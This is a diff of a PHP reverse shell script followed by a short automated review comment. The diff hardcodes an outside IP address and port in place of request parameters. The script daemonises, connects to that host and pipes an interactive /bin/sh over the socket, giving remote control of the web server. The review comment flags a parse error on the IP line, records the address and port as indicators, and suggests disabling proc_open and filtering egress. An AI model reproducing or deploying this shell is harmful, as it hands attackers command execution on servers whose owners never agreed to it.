| 1 | <?php | |
| 2 | ||
| 3 | set_time_limit (0); | |
| 4 | $VERSION = "1.0"; | |
| 5 | - | $ip = $_GET['ip']; |
| 5 | + | $ip = 18.223.41.243; |
| 6 | - | $port = $_GET['port']; |
| 6 | + | $port = 18808; |
| 7 | $chunk_size = 1400; | |
| 8 | $write_a = null; | |
| 9 | $error_a = null; | |
| 10 | $shell = 'uname -a; w; id; /bin/sh -i'; | |
| 11 | $daemon = 0; | |
| 12 | $debug = 0; | |
| 13 | ||
| 14 | if (function_exists('pcntl_fork')) {
| |
| 15 | $pid = pcntl_fork(); | |
| 16 | if ($pid == -1) {
| |
| 17 | printit("ERROR: Can't fork");
| |
| 18 | exit(1); | |
| 19 | } | |
| 20 | if ($pid) {
| |
| 21 | exit(0); // Parent exits | |
| 22 | } | |
| 23 | ||
| 24 | if (posix_setsid() == -1) {
| |
| 25 | printit("Error: Can't setsid()");
| |
| 26 | exit(1); | |
| 27 | } | |
| 28 | ||
| 29 | $daemon = 1; | |
| 30 | } else {
| |
| 31 | printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
| |
| 32 | } | |
| 33 | ||
| 34 | chdir("/");
| |
| 35 | umask(0); | |
| 36 | ||
| 37 | $sock = fsockopen($ip, $port, $errno, $errstr, 30); | |
| 38 | if (!$sock) {
| |
| 39 | printit("$errstr ($errno)");
| |
| 40 | exit(1); | |
| 41 | } | |
| 42 | $descriptorspec = array( | |
| 43 | 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
| |
| 44 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
| |
| 45 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to
| |
| 46 | ); | |
| 47 | ||
| 48 | $process = proc_open($shell, $descriptorspec, $pipes); | |
| 49 | ||
| 50 | if (!is_resource($process)) {
| |
| 51 | printit("ERROR: Can't spawn shell");
| |
| 52 | exit(1); | |
| 53 | } | |
| 54 | ||
| 55 | stream_set_blocking($pipes[0], 0); | |
| 56 | stream_set_blocking($pipes[1], 0); | |
| 57 | stream_set_blocking($pipes[2], 0); | |
| 58 | stream_set_blocking($sock, 0); | |
| 59 | ||
| 60 | printit("Successfully opened reverse shell to $ip:$port");
| |
| 61 | while (1) {
| |
| 62 | if (feof($sock)) {
| |
| 63 | printit("ERROR: Shell connection terminated");
| |
| 64 | break; | |
| 65 | } | |
| 66 | if (feof($pipes[1])) {
| |
| 67 | printit("ERROR: Shell process terminated");
| |
| 68 | break; | |
| 69 | } | |
| 70 | $read_a = array($sock, $pipes[1], $pipes[2]); | |
| 71 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); | |
| 72 | if (in_array($sock, $read_a)) {
| |
| 73 | if ($debug) printit("SOCK READ");
| |
| 74 | $input = fread($sock, $chunk_size); | |
| 75 | if ($debug) printit("SOCK: $input");
| |
| 76 | fwrite($pipes[0], $input); | |
| 77 | } | |
| 78 | if (in_array($pipes[1], $read_a)) {
| |
| 79 | if ($debug) printit("STDOUT READ");
| |
| 80 | $input = fread($pipes[1], $chunk_size); | |
| 81 | if ($debug) printit("STDOUT: $input");
| |
| 82 | fwrite($sock, $input); | |
| 83 | } | |
| 84 | if (in_array($pipes[2], $read_a)) {
| |
| 85 | if ($debug) printit("STDERR READ");
| |
| 86 | $input = fread($pipes[2], $chunk_size); | |
| 87 | if ($debug) printit("STDERR: $input");
| |
| 88 | fwrite($sock, $input); | |
| 89 | } | |
| 90 | } | |
| 91 | ||
| 92 | fclose($sock); | |
| 93 | fclose($pipes[0]); | |
| 94 | fclose($pipes[1]); | |
| 95 | fclose($pipes[2]); | |
| 96 | proc_close($process); | |
| 97 | ||
| 98 | function printit ($string) {
| |
| 99 | if (!$daemon) {
| |
| 100 | print "$string\n"; | |
| 101 | } | |
| 102 | } | |
| 103 | ?> |
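Review bot: New line 5 assigns `$ip` from `18.223.41.243` as shown, which is not a valid PHP expression, so this revision would fail to parse as pasted; the address and port 18808 on new lines 5–6 are still worth recording as indicators if this file turns up on a server. Because the change replaces the `$_GET` lookups with fixed values, the callback no longer depends on request parameters, so triage has to rest on the behaviour visible in the unchanged lines: a PHP process calling `fsockopen` to an external host and then `proc_open` on `/bin/sh -i`. On the hardening side, `disable_functions = proc_open,pcntl_fork` in php.ini and egress filtering from the web tier stop the script at lines 48 and 37 respectively.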